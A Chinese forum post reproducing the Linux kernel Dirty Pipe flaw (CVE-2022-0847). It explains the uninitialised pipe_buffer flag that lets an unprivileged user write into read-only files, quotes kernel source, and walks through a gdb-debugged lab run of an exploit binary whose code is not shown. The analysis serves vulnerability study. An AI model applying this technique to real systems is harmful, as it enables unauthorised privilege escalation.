首页
社区
课程
招聘
[原创]cve-2022-0847复现
发表于: 2023-8-16 17:35 11611

[原创]cve-2022-0847复现

2023-8-16 17:35
11611

在 Linux 内核的 copy_page_to_iter_pipe 和 push_pipe 函数中,管道缓冲区结构的 "flags "成员缺乏正确的初始化,因此可能包含过期的值。无权限的本地用户可利用此漏洞任意写入文件,从而完成提权。

pipe是内核提供的一种通讯机制,返回两个文件描述符,一个用于发送数据,另一个用于接受数据。实现方式是循环队列它只能用于有血缘关系的进程间通信

pipe结构体如下:

bufs是循环数组,head用来写管道,指向buffer头部,tail用来读管道,指向buffer尾部。

pip_buffer结构体如下:

向管道中写数据时会调用函数pipe_write()

pipe_write()关键功能如下:

Linux系统中一切皆文件,Linux系统的很多活动无外乎读操作写操作,零拷贝就是为了提高读写性能而出现的。

我们知道文件一般存放在硬盘(机械硬盘或固态硬盘)中,CPU 并不能直接访问硬盘中的数据,而是需要先将硬盘中的数据读入到内存中,然后才能被 CPU 访问。由于读写硬盘的速度比读写内存要慢很多(DDR4 内存读写速度是机械硬盘500倍,是固态硬盘的200倍),所以为了避免每次读写文件时,都需要对硬盘进行读写操作,Linux 内核使用 页缓存(Page Cache) 机制来对文件中的数据进行缓存。

当用户对文件进行读写时,实际上是对文件的 页缓存 进行读写。所以对文件进行读写操作时,会分以下两种情况进行处理:

将pipe_buffer直接指向页高速缓存作为pipe的buf页使用即可实现以零拷贝的方式在文件描述符之间移动数据。

源码:

关键功能如下:

这里函数没有初始化pipe_buffer的flag,如果用户调用copy_page_to_iter_pipe之前,head指向pipe_buffer是刚申请来的,那此时的pipe_buffer的flag应该为PIPE_BUF_FLAG_CAN_MERGE,如果再次调用pipe_write函数用户就可以向pipe_buffer指向的文件缓存页中写数据,这就造成了一个任意文件写。

copy_page_to_iter_pipe可以由splice调用

直接在docker hub拉个搭建好的环境:https://hub.docker.com/r/chenaotian/cve-2022-0847

启动qemu的时候先把文件系统里的init脚本改一下,setuidgid 0 改成 setuidgid 1000:

启动qemu之后确认testfile事只读文件:

gdb挂上源码在do_splice打断点,执行./exp testfile 1 nihao,断下来之后在copy_page_to_iter_pipe打断点,继续运行,断下来之后运行到取buf的位置:

打印查看pipe->bufs[0]的值:

走到函数结尾处,buf[0]的page被替换为文件页高速缓存,并且offset、len、ops也都被替换,再次查看pipe->bufs[0]的值:

可以看到flag没有被替换,仍然为0x10即PIPE_BUF_FLAG_CAN_MERGE。打断点到pipe_write,继续运行,断下来并执行到取buffer处:

可以看到取出了带有页高速缓存的buf并准备写入。继续运行,成功经过判断到达写入函数:

直接继续运行,查看文件内容:

字符串成功写入只读文件,复现成功。

struct pipe_inode_info {
    struct mutex mutex;
    wait_queue_head_t rd_wait, wr_wait;
    unsigned int head;
    unsigned int tail;
    unsigned int max_usage;
    unsigned int ring_size;
#ifdef CONFIG_WATCH_QUEUE
    bool note_loss;
#endif
    unsigned int nr_accounted;
    unsigned int readers;
    unsigned int writers;
    unsigned int files;
    unsigned int r_counter;
    unsigned int w_counter;
    struct page *tmp_page;
    struct fasync_struct *fasync_readers;
    struct fasync_struct *fasync_writers;
    struct pipe_buffer *bufs;
    struct user_struct *user;
#ifdef CONFIG_WATCH_QUEUE
    struct watch_queue *watch_queue;
#endif
};
struct pipe_inode_info {
    struct mutex mutex;
    wait_queue_head_t rd_wait, wr_wait;
    unsigned int head;
    unsigned int tail;
    unsigned int max_usage;
    unsigned int ring_size;
#ifdef CONFIG_WATCH_QUEUE
    bool note_loss;
#endif
    unsigned int nr_accounted;
    unsigned int readers;
    unsigned int writers;
    unsigned int files;
    unsigned int r_counter;
    unsigned int w_counter;
    struct page *tmp_page;
    struct fasync_struct *fasync_readers;
    struct fasync_struct *fasync_writers;
    struct pipe_buffer *bufs;
    struct user_struct *user;
#ifdef CONFIG_WATCH_QUEUE
    struct watch_queue *watch_queue;
#endif
};
struct pipe_buffer {
    struct page *page;
    unsigned int offset, len;
    const struct pipe_buf_operations *ops;
    unsigned int flags;
    unsigned long private;
};
struct pipe_buffer {
    struct page *page;
    unsigned int offset, len;
    const struct pipe_buf_operations *ops;
    unsigned int flags;
    unsigned long private;
};
pipe_write(struct kiocb *iocb, struct iov_iter *from)
{
  ....
  head = pipe->head;
    was_empty = pipe_empty(head, pipe->tail);
    chars = total_len & (PAGE_SIZE-1);
    if (chars && !was_empty) {
        unsigned int mask = pipe->ring_size - 1;
        struct pipe_buffer *buf = &pipe->bufs[(head - 1) & mask];
        int offset = buf->offset + buf->len;
 
        if ((buf->flags & PIPE_BUF_FLAG_CAN_MERGE) &&
            offset + chars <= PAGE_SIZE) {
            ret = pipe_buf_confirm(pipe, buf);
            if (ret)
                goto out;
 
            ret = copy_page_from_iter(buf->page, offset, chars, from);
            if (unlikely(ret < chars)) {
                ret = -EFAULT;
                goto out;
            }
 
            buf->len += ret;
            if (!iov_iter_count(from))
                goto out;
        }
    }
  for (;;) {
    ....
        if (!pipe_full(head, pipe->tail, pipe->max_usage)) {
            unsigned int mask = pipe->ring_size - 1;
            struct pipe_buffer *buf = &pipe->bufs[head & mask];
            struct page *page = pipe->tmp_page;
            int copied;
 
            if (!page) {
                page = alloc_page(GFP_HIGHUSER | __GFP_ACCOUNT);
                if (unlikely(!page)) {
                    ret = ret ? : -ENOMEM;
                    break;
                }
                pipe->tmp_page = page;
            }
 
            /* Allocate a slot in the ring in advance and attach an
             * empty buffer.  If we fault or otherwise fail to use
             * it, either the reader will consume it or it'll still
             * be there for the next write.
             */
            spin_lock_irq(&pipe->rd_wait.lock);
 
            head = pipe->head;
            if (pipe_full(head, pipe->tail, pipe->max_usage)) {
                spin_unlock_irq(&pipe->rd_wait.lock);
                continue;
            }
 
            pipe->head = head + 1;
            spin_unlock_irq(&pipe->rd_wait.lock);
 
            /* Insert it into the buffer array */
            buf = &pipe->bufs[head & mask];
            buf->page = page;
            buf->ops = &anon_pipe_buf_ops;
            buf->offset = 0;
            buf->len = 0;
            if (is_packetized(filp))
                buf->flags = PIPE_BUF_FLAG_PACKET;
            else
                buf->flags = PIPE_BUF_FLAG_CAN_MERGE;
            pipe->tmp_page = NULL;
    ....
  }
}
pipe_write(struct kiocb *iocb, struct iov_iter *from)
{
  ....
  head = pipe->head;
    was_empty = pipe_empty(head, pipe->tail);
    chars = total_len & (PAGE_SIZE-1);
    if (chars && !was_empty) {
        unsigned int mask = pipe->ring_size - 1;
        struct pipe_buffer *buf = &pipe->bufs[(head - 1) & mask];
        int offset = buf->offset + buf->len;
 
        if ((buf->flags & PIPE_BUF_FLAG_CAN_MERGE) &&
            offset + chars <= PAGE_SIZE) {
            ret = pipe_buf_confirm(pipe, buf);
            if (ret)
                goto out;
 
            ret = copy_page_from_iter(buf->page, offset, chars, from);
            if (unlikely(ret < chars)) {
                ret = -EFAULT;
                goto out;
            }
 
            buf->len += ret;
            if (!iov_iter_count(from))
                goto out;
        }
    }
  for (;;) {
    ....
        if (!pipe_full(head, pipe->tail, pipe->max_usage)) {
            unsigned int mask = pipe->ring_size - 1;
            struct pipe_buffer *buf = &pipe->bufs[head & mask];
            struct page *page = pipe->tmp_page;
            int copied;
 
            if (!page) {
                page = alloc_page(GFP_HIGHUSER | __GFP_ACCOUNT);
                if (unlikely(!page)) {
                    ret = ret ? : -ENOMEM;
                    break;
                }
                pipe->tmp_page = page;
            }
 
            /* Allocate a slot in the ring in advance and attach an
             * empty buffer.  If we fault or otherwise fail to use
             * it, either the reader will consume it or it'll still
             * be there for the next write.
             */
            spin_lock_irq(&pipe->rd_wait.lock);
 
            head = pipe->head;
            if (pipe_full(head, pipe->tail, pipe->max_usage)) {
                spin_unlock_irq(&pipe->rd_wait.lock);
                continue;
            }
 
            pipe->head = head + 1;
            spin_unlock_irq(&pipe->rd_wait.lock);
 
            /* Insert it into the buffer array */
            buf = &pipe->bufs[head & mask];
            buf->page = page;
            buf->ops = &anon_pipe_buf_ops;
            buf->offset = 0;
            buf->len = 0;
            if (is_packetized(filp))
                buf->flags = PIPE_BUF_FLAG_PACKET;
            else
                buf->flags = PIPE_BUF_FLAG_CAN_MERGE;
            pipe->tmp_page = NULL;
    ....
  }
}
static size_t copy_page_to_iter_pipe(struct page *page, size_t offset, size_t bytes,
             struct iov_iter *i)
{
    struct pipe_inode_info *pipe = i->pipe;
    struct pipe_buffer *buf;
    unsigned int p_tail = pipe->tail;
    unsigned int p_mask = pipe->ring_size - 1;
    unsigned int i_head = i->head;
    size_t off;
 
    if (unlikely(bytes > i->count))
        bytes = i->count;
 
    if (unlikely(!bytes))
        return 0;
 
    if (!sanity(i))
        return 0;
 
    off = i->iov_offset;
    buf = &pipe->bufs[i_head & p_mask];
    if (off) {
        if (offset == off && buf->page == page) {
            /* merge with the last one */
            buf->len += bytes;
            i->iov_offset += bytes;
            goto out;
        }
        i_head++;
        buf = &pipe->bufs[i_head & p_mask];
    }
    if (pipe_full(i_head, p_tail, pipe->max_usage))
        return 0;
 
    buf->ops = &page_cache_pipe_buf_ops;
    get_page(page);
    buf->page = page;
    buf->offset = offset;
    buf->len = bytes;
 
    pipe->head = i_head + 1;
    i->iov_offset = offset + bytes;
    i->head = i_head;
out:
    i->count -= bytes;
    return bytes;
}
static size_t copy_page_to_iter_pipe(struct page *page, size_t offset, size_t bytes,
             struct iov_iter *i)
{
    struct pipe_inode_info *pipe = i->pipe;
    struct pipe_buffer *buf;
    unsigned int p_tail = pipe->tail;
    unsigned int p_mask = pipe->ring_size - 1;
    unsigned int i_head = i->head;
    size_t off;
 
    if (unlikely(bytes > i->count))
        bytes = i->count;
 
    if (unlikely(!bytes))
        return 0;
 
    if (!sanity(i))
        return 0;
 
    off = i->iov_offset;
    buf = &pipe->bufs[i_head & p_mask];
    if (off) {
        if (offset == off && buf->page == page) {
            /* merge with the last one */
            buf->len += bytes;
            i->iov_offset += bytes;
            goto out;
        }
        i_head++;
        buf = &pipe->bufs[i_head & p_mask];
    }
    if (pipe_full(i_head, p_tail, pipe->max_usage))
        return 0;
 
    buf->ops = &page_cache_pipe_buf_ops;
    get_page(page);
    buf->page = page;
    buf->offset = offset;
    buf->len = bytes;

[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)

收藏
免费 1
支持
分享
最新回复 (1)
雪    币: 13992
活跃值: (17371)
能力值: ( LV12,RANK:290 )
在线值:
发帖
回帖
粉丝
2
感谢分享
2023-8-16 19:38
0
游客
登录 | 注册 方可回帖
返回
//